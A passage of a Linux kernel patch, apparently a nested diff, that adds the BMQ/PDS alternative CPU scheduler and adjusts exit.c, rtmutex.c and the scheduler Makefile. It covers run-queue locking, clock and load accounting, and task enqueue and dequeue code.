+index 35e0a31a0315..64e368441cf4 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+ 
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+ 
+ 	/*
+@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a..5b9893cdfb1b 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -300,21 +300,25 @@ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+ 	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	waiter->deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+  * Only use with rt_mutex_waiter_{less,equal}()
+  */
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ 
+ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 						struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 						 struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..a9e906b229eb
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,7982 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.1-r4"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
++/* Reschedule if less than this many μs left */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
++ * the domain), this allows us to quickly tell if two cpus are in the same cache
++ * domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for(i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Init idle task and put into queue structure of rq
++ * IMPORTANT: may be called multiple times for a single cpu
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
++/* water mark related functions */
++static inline void update_sched_preempt_mask(struct rq *rq)
++{
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
++
++	if (prio == last_prio)
++		return;
++
++	rq->prio = prio;
++	cpu = cpu_of(rq);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
++		return;
++	}
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
++
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
++#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
++}
++
++/*
++ * This routine assume that the idle task always in queue
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock, it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
++
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compile should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight miss-attribution of {soft,}irq
++	 * time, a more accurate solution would be to update the irq_time using
++	 * the current rq->clock timestamp, except that would require using
++	 * atomic ops.
++	 */
++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
++
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time (or there are RT tasks only).
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * Tick may be needed by tasks in the runqueue depending on their policy and
++ * requirements. If tick is needed, lets send the target an IPI to kick it out
++ * of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	sched_info_dequeue(rq, p);						\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_preempt_mask(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_preempt_mask(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
